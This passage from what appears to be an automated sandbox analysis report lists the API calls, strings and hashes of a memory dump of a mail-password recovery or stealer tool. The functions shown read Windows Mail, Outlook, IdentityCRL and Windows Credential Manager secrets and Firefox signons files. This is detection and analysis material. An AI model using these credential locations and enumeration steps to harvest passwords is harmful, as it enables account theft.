                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                                    • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                                      • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                                    • Salt, xrefs: 00410621
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                    • API String ID: 1673043434-2687544566
                                                                                                    • Opcode ID: 89efb34390a5f1eb67a1bbcd707d8db6dac20416d96f4ed776998dac6c690acb
                                                                                                    • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                                                    • Opcode Fuzzy Hash: 89efb34390a5f1eb67a1bbcd707d8db6dac20416d96f4ed776998dac6c690acb
                                                                                                    • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CBA7, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                    • API String ID: 4281260487-2229823034
                                                                                                    • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                                    • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                                                                    • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                                    • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CBA5, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                    • API String ID: 2822975062-2229823034
                                                                                                    • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                                    • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                                    • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                                    • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D6FB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                    • memset.MSVCRT ref: 0040D743
                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                                    • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                    • API String ID: 551151806-1288872324
                                                                                                    • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                                    • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                                    • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                                    • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                                    • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7661E520), ref: 004047A8
                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                    • memcpy.MSVCRT ref: 0040DADD
                                                                                                    • memcpy.MSVCRT ref: 0040DAF2
                                                                                                      • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                      • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                                      • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                      • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                    • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                                    • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                                    • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                                    • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sprintf.MSVCRT ref: 004080C4
                                                                                                    • LoadMenuA.USER32(?,?), ref: 004080D2
                                                                                                      • Part of subcall function 00407EFB: GetMenuItemCount.USER32(?), ref: 00407F10
                                                                                                      • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                                      • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                                      • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                                    • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                                    • sprintf.MSVCRT ref: 00408134
                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                                    • memset.MSVCRT ref: 00408165
                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408176
                                                                                                    • EnumChildWindows.USER32(00000000,Function_00007FEB,00000000), ref: 0040819E
                                                                                                    • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                    • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                                    • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                                    • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                                    • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                    • API String ID: 667068680-3953557276
                                                                                                    • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                                    • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                                    • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                                    • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404647, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,7661E520), ref: 004046C9
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7661E520), ref: 00404654
                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                    • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                                    • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                                    • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                                    • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041103A
                                                                                                      • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                                    • strlen.MSVCRT ref: 00411056
                                                                                                    • memset.MSVCRT ref: 00411090
                                                                                                    • memset.MSVCRT ref: 004110A4
                                                                                                    • memset.MSVCRT ref: 004110B8
                                                                                                    • memset.MSVCRT ref: 004110DE
                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                      • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                                    • memcpy.MSVCRT ref: 00411115
                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                                    • memcpy.MSVCRT ref: 00411151
                                                                                                    • memcpy.MSVCRT ref: 00411163
                                                                                                    • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                                    • memcpy.MSVCRT ref: 0041126B
                                                                                                    • memcpy.MSVCRT ref: 0041127D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen$strcpy
                                                                                                    • String ID: salu
                                                                                                    • API String ID: 2660478486-4177317985
                                                                                                    • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                                    • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                                    • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                                    • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403E87, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,76020A60,00000000,?,?,004092ED,00000001,00412B1C,76020A60), ref: 00405F17
                                                                                                    • memset.MSVCRT ref: 00403EBF
                                                                                                    • memset.MSVCRT ref: 00403ED3
                                                                                                    • memset.MSVCRT ref: 00403EE7
                                                                                                    • sprintf.MSVCRT ref: 00403F08
                                                                                                    • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                                    • sprintf.MSVCRT ref: 00403F5B
                                                                                                    • sprintf.MSVCRT ref: 00403F8C
                                                                                                    Strings
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                                    • Mail PassView, xrefs: 00403F72
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                                    • API String ID: 1043021993-495024357
                                                                                                    • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                                    • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                                    • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                                    • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404288, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcsstr.MSVCRT ref: 004042BD
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                                    • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                                    • strchr.MSVCRT ref: 00404349
                                                                                                    • strlen.MSVCRT ref: 0040435D
                                                                                                    • sprintf.MSVCRT ref: 0040437E
                                                                                                    • strchr.MSVCRT ref: 0040438F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                    • API String ID: 1359934567-4070641962
                                                                                                    • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                                    • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                                    • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                                    • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040827A, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                                                    • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                                                      • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                                                      • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                                                      • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000004,004080A3,00000000), ref: 004082D8
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000005,004080A3,00000000), ref: 004082E2
                                                                                                    • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                                                    • memset.MSVCRT ref: 00408306
                                                                                                    • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 0040831A
                                                                                                      • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                    • API String ID: 1060401815-3647959541
                                                                                                    • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                                    • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                                                    • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                                    • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                                      • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                                      • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                                      • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                                      • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                                      • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                                      • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                                    • strlen.MSVCRT ref: 0040D241
                                                                                                    • strlen.MSVCRT ref: 0040D24F
                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                    • memset.MSVCRT ref: 0040D28F
                                                                                                    • strlen.MSVCRT ref: 0040D29E
                                                                                                    • strlen.MSVCRT ref: 0040D2AC
                                                                                                    • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                                    • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                    • String ID: none$signons.sqlite$signons.txt
                                                                                                    • API String ID: 2681923396-1088577317
                                                                                                    • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                                    • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                                    • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                                    • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402C44, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                    • memset.MSVCRT ref: 00402C84
                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                    • memset.MSVCRT ref: 00402CDE
                                                                                                    • sprintf.MSVCRT ref: 00402CF7
                                                                                                    • sprintf.MSVCRT ref: 00402D35
                                                                                                      • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                                      • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                    • Opcode ID: 891b38b26bd32f37d73d254dd3b917ada6ad5db3134a279549831ec249256b1d
                                                                                                    • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                                    • Opcode Fuzzy Hash: 891b38b26bd32f37d73d254dd3b917ada6ad5db3134a279549831ec249256b1d
                                                                                                    • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                                    • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                                      • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
